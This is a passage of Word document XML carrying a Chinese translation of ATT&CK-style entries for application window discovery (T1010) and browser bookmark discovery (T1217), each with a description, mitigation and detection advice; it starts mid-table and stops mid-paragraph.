            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将其禁用：计算机配置</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; [</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>策略</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理模板</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>组件</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户界面：枚举权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:t>提升管理员账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39CB759D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D6BD6DC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1E930F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>系统和网络发现技术通常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>拥</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击者试图</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>了解环境的整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分，例如横向移动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FC77D2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程和命令行参数来查看是否有收集</w:t>
      </w:r>
      <w:r>
        <w:t>系统和网络信息的行为。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置功能的远程访问工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以收集</w:t>
      </w:r>
      <w:r>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r>
        <w:t>可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688D972B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用窗口</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="3FCE73CF" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AED2B55" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F4321F" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F4321F">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F4321F">
              <w:t xml:space="preserve"> T1010</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17A42623" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F4321F" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00F4321F">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F4321F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F57C06B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F4321F" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F4321F">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F4321F">
              <w:t xml:space="preserve"> macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="347D8916" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F4321F" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F4321F">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F4321F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F4321F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F00DE05" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F4321F" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F4321F">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F4321F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F4321F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00F4321F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F52352A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F4321F">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F4321F">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E3DA73C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E459D3C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00E756EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会尝试获取打开的应用程序窗口列表。</w:t>
      </w:r>
      <w:r w:rsidRPr="00E756EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E756EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>窗口列表可以传达有关如何使用系统的信息，或者为键盘记录器收集的信息提供上下文。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FADEB20" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00E756EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00E756EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mac</w:t>
      </w:r>
      <w:r w:rsidRPr="00E756EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，这可以使用小型</w:t>
      </w:r>
      <w:r w:rsidRPr="00830953">
        <w:t>AppleScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00E756EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00E756EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E220CC8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00832C1B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B512C8B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00D250C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制轻松缓解，因为它基于滥用系统功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2426D32C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00801070" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00D250C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当攻击者学习环境时，系统和网络发现技术通常在整个操作中发生。不应孤立地查看数据和事件，而应将其视为可能导致基于所获信息的其他活动的行为链的一部分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0336CF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="00D250C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于收集系统和网络信息的操作的进程和命令行参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行监视。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D250C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具有内置功能的远程访问工具可以直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D250C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r w:rsidRPr="00D250C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互以收集信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00830953">
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00830953">
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325A7DCA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00832C1B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E"/>
    <w:p w14:paraId="54988479" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00733C70">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器书签</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="249389B2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A1F0AD8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> T1217</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13EFE819" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75A7C2A6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> Linux, Windows, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FE343A7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CA7467F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控，文件监控，进程命令行参数，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08482E09" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t>: Mike Kemmerer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="541AD613" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B162FA1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0014724C" w:rsidRDefault="00A0413E" w:rsidP="00A0413E"/>
    <w:p w14:paraId="2D2E15A5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以枚举浏览器书签以了解有关受感染主机的更多信息。浏览器书签可以显示有关用户的个人信息（例如：银行网站，兴趣，社交媒体等）以及有关内部网络资源的详细信息，例如服务器，工具</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仪表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盘</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或其他相关基础架构。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0132D5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在攻击者可以访问有效凭据后，浏览器书签还可以突出显示其他目标，尤其是与浏览器缓存的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的</w:t>
      </w:r>
      <w:r w:rsidRPr="00830953">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中的凭据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3507F1B1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特定存储位置因平台和</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或应用程序而异，但浏览器书签通常存储在本地文件</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCFE4C0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E875E3D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00D250C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
